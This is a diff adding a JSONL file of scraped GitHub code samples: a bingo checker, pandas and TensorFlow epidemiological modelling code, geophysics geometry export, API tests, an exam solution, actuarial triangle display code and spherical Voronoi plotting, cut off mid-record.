diff --git "a/5006.jsonl" "b/5006.jsonl" new file mode 100644--- /dev/null +++ "b/5006.jsonl" @@ -0,0 +1,2134 @@ +{"seq_id":"2228900415","text":"# Bingo: verificando uma cartela vencedora\r\nimport random\r\ndef dicionário_bingo(sorteados):\r\n dicionario = {'B':'','I':'','N':'','G':'','O':''}\r\n inicio=1\r\n fim=16\r\n for chave in dicionario:\r\n lista= []\r\n while len(lista)<5:\r\n numero = random.randrange(inicio,fim)\r\n if numero not in lista:\r\n if numero in sorteados:\r\n lista.append(0)\r\n else:\r\n lista.append(numero)\r\n dicionario[chave]=lista\r\n inicio+=15\r\n fim+=15\r\n\r\n return dicionario\r\n\r\ndef cartela_bingo(dicionario):\r\n print('-----------------------------------')\r\n for chave in dicionario:\r\n print( chave,'\\t', end='')\r\n print('\\n-----------------------------------')\r\n\r\n for i in range(5):\r\n for chave in dicionario:\r\n print(dicionario[chave][i],'\\t', end='')\r\n print()\r\n return ''\r\n\r\ndef cartela_vencedora(dicionario):\r\n conjunto = set()\r\n verdadeiro = {0,0,0,0,0}\r\n\r\n # verificar linhas\r\n for i in range(5):\r\n for chave in dicionario:\r\n conjunto.add(dicionario[chave][i])\r\n if conjunto.issubset(verdadeiro):\r\n return True\r\n conjunto.clear()\r\n \r\n # verificar colunas\r\n for chave in dicionario:\r\n for numero in dicionario[chave]:\r\n conjunto.add(numero)\r\n if conjunto.issubset(verdadeiro):\r\n return True\r\n conjunto.clear()\r\n\r\n # verificar diagonais\r\n i = 0\r\n for chave in dicionario:\r\n conjunto.add(dicionario[chave][i])\r\n i+=1\r\n if conjunto.issubset(verdadeiro):\r\n return True\r\n conjunto.clear()\r\n \r\n i = 4 \r\n for chave in dicionario:\r\n conjunto.add(dicionario[chave][i])\r\n i-=1\r\n if conjunto.issubset(verdadeiro):\r\n return True\r\n return False\r\n\r\ndef main():\r\n sorteados = set()\r\n while len(sorteados)<5:\r\n numero = random.randrange(1,76)\r\n if numero not in sorteados:\r\n sorteados.add(numero)\r\n \r\n cartela_diagonal = {'B': [7, 11, 12, 8, 0], 'I': [25, 27, 19, 0, 25], 'N': [40, 39, 0, 33, 44], 'G': [49, 0, 58, 48, 60], 'O': [0, 73, 63, 75, 62]}\r\n \r\n cartela_horizontal = {'B': [0, 11, 12, 8, 9], 'I': [0, 27, 19, 29, 25], 'N': [0, 40, 39, 33, 44], 'G': [0, 55, 58, 48, 60], 'O': [0, 73, 63, 75, 62]}\r\n \r\n cartela_vertical = {'B': [5, 9, 15, 10, 4], 'I': [0, 0, 0, 0, 0], 'N': [36, 38, 44, 33, 45], 'G': [50, 48, 56, 60, 51], 'O': [67, 64, 70, 75, 62]}\r\n \r\n cartela_aleatória = dicionário_bingo(sorteados)\r\n\r\n cartelas = [cartela_diagonal, cartela_horizontal ,cartela_vertical ,cartela_aleatória]\r\n\r\n for elemento in cartelas:\r\n if cartela_vencedora(elemento):\r\n print('CARTELA VENCEDORA:')\r\n else:\r\n print('CARTELA NÃO VENCEDORA:')\r\n print(cartela_bingo(elemento))\r\n \r\nif __name__==\"__main__\":\r\n main()","repo_name":"nickellen/Algoritmos","sub_path":"lista 7/MES-Alg-07-Ex-08.py","file_name":"MES-Alg-07-Ex-08.py","file_ext":"py","file_size_in_byte":2944,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40805802950","text":"import pandas as pd\nimport numpy as np\n\ndates = pd.date_range('20130101', periods=6)\ndf = pd.DataFrame(data=np.random.randn(6,4), index=dates, columns=['A', 'B', 'C', 'D'])\n\n#根据下标改变某一个的值\ndf.iloc[2,2] = 111\n\n#根据标签改变某一个值\ndf.loc['201430101','B'] = 222\n\n#根据标签+数字改变值\n#df.ix[[:3],'A'] = 333\n\n#根据条件改变值\ndf.A[df.A>0] = 0\ndf[df.A>0] = 0\n\n#加入新的列\ndf['F'] = np.nan\n\n#添加新的一列--\ndf['E'] = pd.Series([1,2,3,4,5,6],index=pd.date_range('20130101',periods = 
6))\nprint(df)","repo_name":"jainszhang/LearnDM","sub_path":"ML/pandas_numpy/pandas/pandas3-设置值.py","file_name":"pandas3-设置值.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73771068007","text":"import tensorflow as tf\nimport numpy as np\nimport pandas as pd\nimport plotting_funcs as pf\nfrom collections import namedtuple\nimport tf_att_fracts\n\n\ndef att_fract_fn(mixing_matrices, parms):\n def compute_att_fracts(args):\n state, covariate_pointers, event_id, event_pid = args\n\n memb_mat_t = tf.gather(\n mixing_matrices[\"memb_mats\"],\n covariate_pointers,\n name=\"gather_memb_mats\",\n )\n\n adj_mat_t = tf.gather(\n mixing_matrices[\"adj_mats\"],\n covariate_pointers,\n name=\"gather_adj_mats\",\n )\n\n is_in_hospital_t = tf.gather(\n mixing_matrices[\"hospital_status_mats\"],\n covariate_pointers,\n name=\"gather_hosp_status\",\n )\n\n spatial_conn_t = tf.gather(\n mixing_matrices[\"spatial_conn_mats\"],\n covariate_pointers,\n name=\"gather_spatial_status\",\n )\n\n # Number of infectious individuals in each group\n inf_group = tf.linalg.matvec(\n memb_mat_t,\n tf.gather(state, 2) * is_in_hospital_t,\n transpose_a=True,\n name=\"inf_group_matmul\",\n )\n\n foi_group = (\n parms[\"beta1\"] * inf_group\n + parms[\"beta2\"]\n * tf.linalg.matvec(\n adj_mat_t, inf_group, name=\"adj_mat_t_inf_group_matvec\"\n )\n + parms[\"beta3\"]\n * tf.linalg.matvec(\n spatial_conn_t,\n inf_group,\n name=\"spatial_mat_t_inf_group_matvec\",\n )\n + parms[\"beta4\"]\n )\n\n # FOI components\n foi_within_ward = parms[\"beta1\"] * inf_group\n foi_between_ward = parms[\"beta2\"] * tf.linalg.matvec(\n adj_mat_t, inf_group, name=\"adj_mat_t_inf_group_matvec\"\n ) + parms[\"beta3\"] * tf.linalg.matvec(\n spatial_conn_t,\n inf_group,\n name=\"spatial_mat_t_inf_group_matvec\",\n )\n foi_background = parms[\"beta4\"]\n\n # Attributable fractions\n pr_within_ward = foi_within_ward / foi_group\n\n pr_between_ward = foi_between_ward / foi_group\n\n pr_beta2 = (\n parms[\"beta2\"]\n * tf.linalg.matvec(\n adj_mat_t, inf_group, name=\"adj_mat_t_inf_group_matvec\"\n )\n ) / foi_group\n\n pr_beta3 = (\n parms[\"beta3\"]\n * tf.linalg.matvec(\n spatial_conn_t,\n inf_group,\n name=\"spatial_mat_t_inf_group_matvec\",\n )\n ) / foi_group\n\n pr_background = parms[\"beta4\"] / foi_group\n\n # Identify which ward the exposure event occured in\n ward_exp = tf.cond(\n tf.gather(is_in_hospital_t, event_pid) == 1,\n true_fn=lambda: tf.gather(memb_mat_t, event_pid),\n false_fn=lambda: tf.zeros_like(inf_group),\n )\n\n # Create dictionary of attributatble fractions - return np.nan if exposure happened in the community\n att_fracts = {\n \"event_unit\": event_pid,\n \"pr_within_ward\": tf.reduce_sum(pr_within_ward * ward_exp),\n \"pr_between_ward\": tf.reduce_sum(pr_between_ward * ward_exp),\n \"pr_background\": tf.reduce_sum(pr_background * ward_exp),\n \"pr_community\": tf.cond(\n tf.gather(is_in_hospital_t, event_pid) == 1,\n true_fn=lambda: 0.0,\n false_fn=lambda: 1.0,\n ),\n }\n\n between_ward_fracts = {\n \"event_unit\": event_pid,\n \"pr_beta2\": tf.reduce_sum(pr_beta2 * ward_exp),\n \"pr_beta3\": tf.reduce_sum(pr_beta3 * ward_exp),\n }\n\n all_wards_pr = {\n \"foi_by_ward\": foi_group,\n \"foi_within_ward\": foi_within_ward * 1,\n \"foi_between_ward\": foi_between_ward * 1,\n \"foi_background\": foi_background * 1,\n }\n\n between_ward_transmission = pr_between_ward * ward_exp\n\n return (\n att_fracts,\n 
between_ward_fracts,\n ward_exp,\n between_ward_transmission,\n all_wards_pr,\n )\n\n return compute_att_fracts\n\n\ndef determine_att_fracts(\n post,\n model_vars,\n transmission_table_pids,\n fixed_event_list,\n all_wards,\n hospital_event_times,\n ward_cols,\n):\n between_ward_att_fract = []\n att_fracts_all = []\n exp_by_ward = []\n ward_cols_nosoc = []\n ward_foi_within_ward_all = []\n ward_foi_between_ward_all = []\n ward_foi_background_all = []\n ward_foi_all = []\n\n EventList = namedtuple(\"EventList\", [\"time\", \"unit\", \"event\"])\n\n for i in range(0, post.beta1.shape[0] - 1):\n event_list = EventList(\n tf.convert_to_tensor(post.time[i]),\n tf.convert_to_tensor(post.unit[i]),\n tf.convert_to_tensor(post.event[i]),\n )\n\n ChainState = namedtuple(\n \"ChainState\", [\"beta1\", \"beta2\", \"beta3\", \"beta4\", \"beta5\"]\n )\n\n fixed_parms = {\n k: v\n for k, v in model_vars[\"parms\"].items()\n if k not in [\"beta1\", \"beta2\", \"beta3\", \"beta4\", \"beta5\"]\n }\n\n compute_att_fracts = tf_att_fracts.build_att_fracts_fn(\n model_vars[\"hospital_events\"],\n model_vars[\"study_start_time\"],\n model_vars[\"global_ids\"],\n transmission_table_pids,\n model_vars[\"pat_first_pos\"],\n model_vars[\"mixing_matrices\"],\n fixed_parms,\n fixed_event_list,\n tf.constant(True),\n )\n\n post_state = ChainState(\n beta1=post.beta1[i],\n beta2=post.beta2[i],\n beta3=post.beta3[i],\n beta4=post.beta4[i],\n beta5=post.beta5[i],\n )\n (\n att_fracts,\n between_ward_fracts,\n ward_exp,\n between_ward_transmission,\n covariate_pointers_exp,\n all_wards_pr,\n ) = compute_att_fracts(post_state, event_list)\n\n att_fracts = pd.DataFrame(\n {\n \"pr_within_ward\": att_fracts[\"pr_within_ward\"],\n \"pr_between_ward\": att_fracts[\"pr_between_ward\"],\n \"pr_background\": att_fracts[\"pr_background\"],\n \"pr_community\": att_fracts[\"pr_community\"],\n \"event_unit\": att_fracts[\"event_unit\"],\n }\n )\n\n ward_foi_within_ward = pd.DataFrame(all_wards_pr[\"foi_within_ward\"])\n ward_foi_between_ward = pd.DataFrame(all_wards_pr[\"foi_between_ward\"])\n ward_foi_background = pd.DataFrame(all_wards_pr[\"foi_background\"])\n ward_foi = pd.DataFrame(all_wards_pr[\"foi_by_ward\"])\n ward_foi_cov = pd.DataFrame({\"cov_points\": covariate_pointers_exp})\n ward_foi = pd.concat([ward_foi, ward_foi_cov], axis=1)\n ward_foi_within_ward = pd.concat(\n [ward_foi_within_ward, ward_foi_cov], axis=1\n )\n ward_foi_between_ward = pd.concat(\n [ward_foi_between_ward, ward_foi_cov], axis=1\n )\n ward_foi_background = pd.concat(\n [ward_foi_background, ward_foi_cov], axis=1\n )\n\n att_fracts_all.append(att_fracts)\n ward_foi_within_ward_all.append(ward_foi_within_ward)\n ward_foi_between_ward_all.append(ward_foi_between_ward)\n ward_foi_background_all.append(ward_foi_background)\n ward_foi_all.append(ward_foi)\n\n hosp_exp_between_ward = pd.DataFrame(\n {\n \"pr_beta2\": between_ward_fracts[\"pr_beta2\"],\n \"pr_beta3\": between_ward_fracts[\"pr_beta3\"],\n \"event_unit\": between_ward_fracts[\"event_unit\"],\n }\n )\n between_ward_att_fract.append(hosp_exp_between_ward)\n\n # Nosocomial exposures by ward\n exposures_on_each_ward = tf.cast(tf.reduce_sum(ward_exp, 0), tf.int32)\n ward_exposures = pd.DataFrame(\n {\"wards\": all_wards, \"exposures\": exposures_on_each_ward}\n )\n ward_exposures[\"perc\"] = np.round(\n (ward_exposures[\"exposures\"] / sum(ward_exposures[\"exposures\"]))\n * 100,\n 2,\n )\n ward_exposures.sort_values(by=[\"perc\"], ascending=False, inplace=True)\n 
exp_by_ward.append(ward_exposures)\n\n # Nosocomial exposure by ward colour\n hosp_exp_inds = tf.where(att_fracts[\"pr_community\"] != 1.0)\n covariate_times_hosp_exp = tf.gather(\n covariate_pointers_exp, hosp_exp_inds\n )\n hosp_exp_time_from_study = tf.gather(\n hospital_event_times, covariate_times_hosp_exp\n )\n\n ward_exp_hosp = tf.squeeze(tf.gather(ward_exp, hosp_exp_inds))\n ward_exp_hosp = tf.gather(\n tf.where(ward_exp_hosp > 0), indices=1, axis=1\n )\n wards_exp_hosp = [all_wards[x] for x in ward_exp_hosp]\n\n wards_exp_hosp_col_day = tf.cast(\n tf.math.floor(hosp_exp_time_from_study), tf.int64\n )\n ward_exp_hosp_col = [\n ward_cols[x][y]\n for x, y in zip(\n wards_exp_hosp, np.array(tf.squeeze(wards_exp_hosp_col_day))\n )\n ]\n ward_cols_hosp_exp = pd.DataFrame(\n {\"colour\": ward_exp_hosp_col, \"freq\": 1}\n )\n ward_cols_hosp_exp = ward_cols_hosp_exp.groupby([\"colour\"]).agg(\n {\"freq\": sum}\n )\n ward_cols_hosp_exp[\"perc\"] = ward_cols_hosp_exp.apply(\n lambda x: 100 * (x / x.sum())\n )\n\n ward_cols_nosoc.append(ward_cols_hosp_exp)\n\n return (\n att_fracts_all,\n exp_by_ward,\n ward_foi_all,\n ward_foi_within_ward_all,\n ward_foi_between_ward_all,\n ward_foi_background_all,\n ward_cols_nosoc,\n )\n","repo_name":"jbridgen/nosocomial_covid_model","sub_path":"hospital_model/att_fracts_funcs.py","file_name":"att_fracts_funcs.py","file_ext":"py","file_size_in_byte":9782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"75115189927","text":"from pyrocko.model import event\r\nfrom pyrocko import orthodrome as ortho, util\r\nfrom pyrocko.guts import dump\r\nfrom collections import defaultdict\r\nimport sys\r\nfrom pathlib import Path\r\nimport numpy as num\r\n\r\nkm = 1000.\r\nr_earth = 6371. * km # mean Earth radius in m\r\n\r\nglobal evpath\r\n\r\n\r\ndef duplicate_property(array):\r\n ndims = len(array.shape)\r\n if ndims == 1:\r\n return num.hstack((array, array))\r\n elif ndims == 2:\r\n return num.vstack((array, array))\r\n else:\r\n raise TypeError('Only 1-2d data supported!')\r\n\r\n\r\ndef to_cartesian(items, reflatlon):\r\n res = defaultdict()\r\n for i, item in enumerate(items):\r\n\r\n y, x = ortho.latlon_to_ne(reflatlon, item)\r\n depth = item.depth\r\n elevation = item.elevation\r\n dz = elevation - depth\r\n lat = item.lat/180.*num.pi\r\n z = r_earth+dz*num.sin(lat)\r\n res[item.nsl()[:2]] = (x, y, z)\r\n return res\r\n\r\n\r\ndef cmp(a, b):\r\n return (a > b) - (a < b)\r\n\r\n\r\ndef well_geometry_sparrow_export(file, folder, name):\r\n import utm\r\n from pyproj import Proj\r\n from pyrocko.model import Geometry\r\n data = num.loadtxt(file, delimiter=\",\")\r\n utmx = data[:, 0]\r\n utmy = data[:, 1]\r\n z = data[:, 2]\r\n\r\n proj_gk4 = Proj(init=\"epsg:31467\") # GK-projection\r\n lons, lats = proj_gk4(utmx, utmy, inverse=True)\r\n ev = event.Event(lat=num.mean(lats), lon=num.mean(lons), depth=num.mean(z),\r\n time=util.str_to_time(\"2000-01-01 01:01:01\"))\r\n\r\n ncorners = 4\r\n verts = []\r\n xs = []\r\n ys = []\r\n dist = 200.\r\n for i in range(0, len(z)):\r\n try:\r\n x = lats[i]\r\n y = lons[i]\r\n x1 = lats[i+1]\r\n y1 = lons[i+1]\r\n depth = z[i]\r\n depth1 = z[i+1]\r\n xyz = ([dist/2.8, dist/2.8, depth], [dist/2.8, dist/2.8, depth1],\r\n [dist/2.8, -dist/2.8, depth1], [dist/2.8, -dist/2.8, depth])\r\n latlon = ([x, y], [x1, y1], [x1, y1], [x, y])\r\n patchverts = num.hstack((latlon, xyz))\r\n verts.append(patchverts)\r\n except Exception:\r\n pass\r\n\r\n vertices = num.vstack(verts)\r\n\r\n npatches = int(len(vertices))\r\n faces1 = num.arange(ncorners * npatches, dtype='int64').reshape(\r\n npatches, ncorners)\r\n faces2 = num.fliplr(faces1)\r\n faces = num.hstack((faces2, faces1))\r\n srf_semblance_list = []\r\n\r\n srf_semblance = 
num.ones(num.shape(data[:, 2]))\n srf_semblance = duplicate_property(srf_semblance)\n srf_semblance_list.append(srf_semblance)\n\n srf_semblance = num.asarray(srf_semblance_list).T\n srf_times = num.linspace(0, 1, 1)\n geom = Geometry(times=srf_times, event=ev)\n geom.setup(vertices, faces)\n sub_headers = tuple([str(i) for i in srf_times])\n geom.add_property((('semblance', 'float64', sub_headers)), srf_semblance)\n dump(geom, filename='geom_gtla1.yaml')\n","repo_name":"braunfuss/silvertine","sub_path":"src/util/geom.py","file_name":"geom.py","file_ext":"py","file_size_in_byte":2732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42619944332","text":"import base64\nimport datetime\nimport pathlib\n\nimport pymongo\nimport pytest\n\nfrom equilibrium.api.api import get_app\nfrom equilibrium.api.__main__ import main\n\nUSER = {\n \"user_id\": 1,\n \"username\": \"John Smith\",\n \"birthday\": int(datetime.datetime(year=1997, month=8, day=18).timestamp()),\n \"gender\": 0,\n}\n\nSNAPSHOT = {\n \"user_id\": 1,\n \"timestamp\": int(datetime.datetime.now().timestamp() * 1000),\n \"feelings\": {\n \"hunger\": 0,\n \"thirst\": 0,\n \"exhaustion\": 0,\n \"happiness\": 0,\n },\n \"color_image\": {\n \"width\": 1920,\n \"height\": 1080,\n \"data\": str(pathlib.Path(__file__).absolute().parent / \"resources/color_image.jpg\"),\n }\n}\n\nDATA = base64.b64encode(pathlib.Path(SNAPSHOT[\"color_image\"][\"data\"]).read_bytes()).decode()\n\n\n@pytest.fixture(scope=\"module\")\ndef api_state(mongodb, simulate_tcp_27017):\n c = pymongo.MongoClient(host=\"127.0.0.1\", port=27017)\n c.db.users.insert_one(USER)\n c.db.snapshots.insert_one(SNAPSHOT)\n\n app = get_app(\"mongodb://127.0.0.1:27017\")\n with app.test_client() as client:\n yield client\n\n\ndef test_get_users(api_state):\n r = api_state.get(\"/users\")\n assert r.json == [{\"user_id\": USER[\"user_id\"], \"username\": USER[\"username\"]}]\n\n\ndef test_get_user(api_state):\n r = api_state.get(f\"/users/{USER['user_id']}\")\n assert r.json == {\"user_id\": USER[\"user_id\"], \"username\": USER[\"username\"],\n \"birthday\": USER[\"birthday\"], \"gender\": USER[\"gender\"]}\n\n\ndef test_get_snapshots(api_state):\n r = api_state.get(f\"/users/{USER['user_id']}/snapshots\")\n assert r.json == [SNAPSHOT[\"timestamp\"]]\n\n\ndef test_get_snapshot(api_state):\n r = api_state.get(f\"/users/{USER['user_id']}/snapshots/{SNAPSHOT['timestamp']}\")\n assert r.json == {\"timestamp\": SNAPSHOT[\"timestamp\"],\n \"results\": [\"feelings\", \"color_image\"]}\n\n\ndef test_get_result(api_state):\n r = api_state.get(f\"/users/{USER['user_id']}/snapshots/{SNAPSHOT['timestamp']}/feelings\")\n assert r.json == SNAPSHOT[\"feelings\"]\n\n\ndef test_get_result_data(api_state):\n r = api_state.get(f\"/users/{USER['user_id']}/snapshots/{SNAPSHOT['timestamp']}/color_image/data\")\n assert r.json == {\"width\": SNAPSHOT[\"color_image\"][\"width\"],\n \"height\": SNAPSHOT[\"color_image\"][\"height\"],\n \"data\": DATA\n }\n","repo_name":"talelburg/equilibrium","sub_path":"tests/equilibrium/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24934797566","text":"from project.planet.planet_repository import PlanetRepository\nfrom project.planet.planet import Planet\nfrom project.astronaut.astronaut_repository import AstronautRepository\nfrom project.astronaut.biologist import 
Biologist\nfrom project.astronaut.geodesist import Geodesist\nfrom project.astronaut.meteorologist import Meteorologist\n\n\nclass SpaceStation:\n ASTRONAUT_TYPES = {\n \"Biologist\": Biologist,\n \"Geodesist\": Geodesist,\n \"Meteorologist\": Meteorologist\n }\n\n SUCCESSFUL_MISSIONS = 0\n UNSUCCESSFUL_MISSIONS = 0\n\n def __init__(self):\n self.planet_repository = PlanetRepository()\n self.astronaut_repository = AstronautRepository()\n\n def add_astronaut(self, astronaut_type: str, name: str):\n if self.astronaut_repository.find_by_name(name):\n return f\"{name} is already added.\"\n\n if astronaut_type not in self.ASTRONAUT_TYPES:\n raise Exception(\"Astronaut type is not valid!\")\n\n self.astronaut_repository.add(self.ASTRONAUT_TYPES[astronaut_type](name))\n\n return f\"Successfully added {astronaut_type}: {name}.\"\n\n def add_planet(self, name: str, items: str):\n if self.planet_repository.find_by_name(name):\n return f\"{name} is already added.\"\n\n planet_obj = Planet(name)\n planet_obj.items = items.split(\", \")\n self.planet_repository.add(planet_obj)\n\n return f\"Successfully added Planet: {name}.\"\n\n def retire_astronaut(self, name: str):\n astronaut_obj = self.astronaut_repository.find_by_name(name)\n\n if not astronaut_obj:\n raise Exception(f\"Astronaut {name} doesn't exist!\")\n\n self.astronaut_repository.remove(astronaut_obj)\n return f\"Astronaut {name} was retired!\"\n\n def recharge_oxygen(self):\n for astronaut in self.astronaut_repository.astronauts:\n astronaut.increase_oxygen(10)\n\n def send_on_mission(self, planet_name: str):\n planet_obj = self.planet_repository.find_by_name(planet_name)\n\n if not planet_obj:\n raise Exception(\"Invalid planet name!\")\n\n suitable_astronauts = [a for a in self.astronaut_repository.astronauts if a.oxygen > 30]\n\n if not suitable_astronauts:\n raise Exception(\"You need at least one astronaut to explore the planet!\")\n\n sorted_suitable = sorted(suitable_astronauts, key=lambda x: -x.oxygen)\n\n explorer_count = 0\n for curr_astr in sorted_suitable:\n explorer_count += 1\n\n while planet_obj.items:\n curr_item = planet_obj.items.pop()\n curr_astr.backpack.append(curr_item)\n curr_astr.breathe()\n\n if len(planet_obj.items) == 0:\n self.SUCCESSFUL_MISSIONS += 1\n return f\"Planet: {planet_name} was explored. {explorer_count}\" \\\n f\" astronauts participated in collecting items.\"\n\n if curr_astr.oxygen <= 0:\n break\n\n if explorer_count == 5:\n break\n\n self.UNSUCCESSFUL_MISSIONS += 1\n return \"Mission is not completed.\"\n\n def report(self):\n result = [f\"{self.SUCCESSFUL_MISSIONS} successful missions!\",\n f\"{self.UNSUCCESSFUL_MISSIONS} missions were not completed!\", f\"Astronauts' info:\"]\n\n for astronaut in self.astronaut_repository.astronauts:\n result.append(f\"Name: {astronaut.name}\")\n result.append(f\"Oxygen: {astronaut.oxygen}\")\n backpack = \"none\" if len(astronaut.backpack) == 0 else \", \".join(astronaut.backpack)\n result.append(f\"Backpack items: {backpack}\")\n\n return \"\\n\".join(result)\n","repo_name":"Polishko/SoftUni","sub_path":"OOP-Exam-Questions/23 August 2021 - Retake/project/space_station.py","file_name":"space_station.py","file_ext":"py","file_size_in_byte":3700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12447728908","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. 
If a copy of the MPL was not distributed with this\n# file, You can obtain one at https://mozilla.org/MPL/2.0/.\nimport pandas as pd\nimport numpy as np\nimport re\n\ntry:\n from IPython.core.display import HTML\nexcept:\n HTML = None\n\n\nclass TriangleDisplay:\n def __repr__(self):\n if (self.values.shape[0], self.values.shape[1]) == (1, 1):\n data = self._repr_format()\n return data.to_string()\n else:\n return self._summary_frame().__repr__()\n\n def _summary_frame(self):\n return pd.Series(\n [\n self.valuation_date.strftime(\"%Y-%m\"),\n \"O\" + self.origin_grain + \"D\" + self.development_grain,\n self.shape,\n self.key_labels,\n list(self.vdims),\n ],\n index=[\"Valuation:\", \"Grain:\", \"Shape:\", \"Index:\", \"Columns:\"],\n name=\"Triangle Summary\",\n ).to_frame()\n\n def _repr_html_(self):\n \"\"\" Jupyter/Ipython HTML representation \"\"\"\n if (self.values.shape[0], self.values.shape[1]) == (1, 1):\n data = self._repr_format()\n fmt_str = self._get_format_str(data)\n default = (\n data.to_html(\n max_rows=pd.options.display.max_rows,\n max_cols=pd.options.display.max_columns,\n float_format=fmt_str.format,\n )\n .replace(\"nan\", \"\")\n .replace(\"NaN\", \"\")\n )\n return default\n else:\n return self._summary_frame().to_html(\n max_rows=pd.options.display.max_rows,\n max_cols=pd.options.display.max_columns,\n )\n\n def _get_format_str(self, data):\n if np.all(np.isnan(data)):\n return \"\"\n elif np.nanmean(abs(data)) < 10:\n return \"{0:,.4f}\"\n elif np.nanmean(abs(data)) < 1000:\n return \"{0:,.2f}\"\n else:\n return \"{:,.0f}\"\n\n def _repr_format(self, origin_as_datetime=False):\n out = self.compute().set_backend(\"numpy\").values[0, 0]\n if origin_as_datetime and not self.is_pattern:\n origin = self.origin.to_timestamp(how='s')\n else:\n origin = self.origin.copy()\n origin.name = None\n\n if self.origin_grain == \"S\" and not origin_as_datetime:\n origin_formatted = [\"\"] * len(origin)\n for origin_index in range(len(origin)):\n origin_formatted[origin_index] = (\n origin.astype(\"str\")[origin_index]\n .replace(\"Q1\", \"H1\")\n .replace(\"Q3\", \"H2\")\n )\n origin = origin_formatted\n development = self.development.copy()\n development.name = None\n return pd.DataFrame(out, index=origin, columns=development)\n\n def heatmap(self, cmap=\"coolwarm\", low=0, high=0, axis=0, subset=None):\n \"\"\" Color the background in a gradient according to the data in each\n column (optionally row). 
Requires matplotlib\n\n Parameters\n ----------\n\n cmap : str or colormap\n matplotlib colormap\n low, high : float\n compress the range by these values.\n axis : int or str\n The axis along which to apply heatmap\n subset : IndexSlice\n a valid slice for data to limit the style application to\n\n Returns\n -------\n Ipython.display.HTML\n\n \"\"\"\n if (self.values.shape[0], self.values.shape[1]) == (1, 1):\n data = self._repr_format()\n fmt_str = self._get_format_str(data)\n\n axis = self._get_axis(axis)\n\n raw_rank = data.rank(axis=axis)\n shape_size = data.shape[axis]\n rank_size = data.rank(axis=axis).max(axis=axis)\n gmap = (raw_rank - 1).div(rank_size - 1, axis=not axis) * (\n shape_size - 1\n ) + 1\n gmap = gmap.replace(np.nan, (shape_size + 1) / 2)\n if pd.__version__ >= \"1.3\":\n default_output = (\n data.style.format(fmt_str)\n .background_gradient(\n cmap=cmap,\n low=low,\n high=high,\n axis=None,\n subset=subset,\n gmap=gmap,\n )\n .to_html()\n )\n else:\n default_output = (\n data.style.format(fmt_str)\n .background_gradient(cmap=cmap, low=low, high=high, axis=axis,)\n .render()\n )\n output_xnan = re.sub(\"\", \"\", default_output)\n else:\n raise ValueError(\"heatmap only works with single triangles\")\n if HTML:\n return HTML(output_xnan)\n elif HTML is None:\n raise ImportError(\"heatmap requires IPython\")\n","repo_name":"casact/chainladder-python","sub_path":"chainladder/core/display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":5091,"program_lang":"python","lang":"en","doc_type":"code","stars":162,"dataset":"github-code","pt":"53"} +{"seq_id":"25042193171","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom pymerlin.trajectory import *\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom scipy.spatial import SphericalVoronoi, geometric_slerp\nfrom mpl_toolkits.mplot3d.art3d import Poly3DCollection\nfrom matplotlib import colors\nimport scipy\nfrom matplotlib import cm\n\n\ndef fibonacci(k):\n \"\"\"\n Calculates the kth Fibonacci number\n \"\"\"\n\n if k == 0:\n return 0\n elif k == 1 or k == 2:\n return 1\n else:\n return fibonacci(k-1)+fibonacci(k-2)\n\n\ndef voronoi_area(traj, aref=None, vmin=None, vmax=None):\n nspokes, _ = traj.shape\n radius = 1\n center = np.array([0, 0, 0])\n sv = SphericalVoronoi(traj, radius, center)\n\n if not aref:\n Asphere = 4*np.pi\n aref = Asphere/nspokes\n\n areas = sv.calculate_areas()\n Amax = max(areas)\n areas /= aref\n\n if vmax:\n areas[areas > vmax] = vmax\n if vmin:\n areas[areas < vmin] = vmin\n\n return sv, areas\n\n\ndef voronoi_3D(traj, ax=None, aref=None, cmap='RdBu_r', vmin=0.7, vmax=1.3, title=''):\n \"\"\"\n Make a 3D voronoi diagram with patch color based on path area\n relative to area for perfectly even sampled\n \"\"\"\n\n sv, areas = voronoi_area(traj, aref=aref, vmin=vmin, vmax=vmax)\n m = cm.ScalarMappable(cmap=cm.get_cmap(\n cmap), norm=plt.Normalize(vmin=vmin, vmax=vmax))\n\n sv.sort_vertices_of_regions()\n if not ax:\n ax = plt.gca()\n\n fig = plt.gcf()\n for n in range(0, len(sv.regions)):\n region = sv.regions[n]\n random_color = colors.rgb2hex(scipy.rand(3))\n ax.scatter(traj[n, 0], traj[n, 1], traj[n, 2], c='k', alpha=0)\n polygon = Poly3DCollection([sv.vertices[region]], alpha=1.0)\n polygon.set_color(m.to_rgba(areas[n]))\n ax.add_collection3d(polygon)\n\n ax.set_xlabel(r'$k_x$')\n ax.set_ylabel(r'$k_y$')\n ax.set_zlabel(r'$k_z$')\n ax.set_xticks([-1, 0, 1])\n ax.set_yticks([-1, 0, 1])\n ax.set_zticks([-1, 0, 1])\n cbar = fig.colorbar(m, shrink=0.75, pad=0.15, label='Relative 
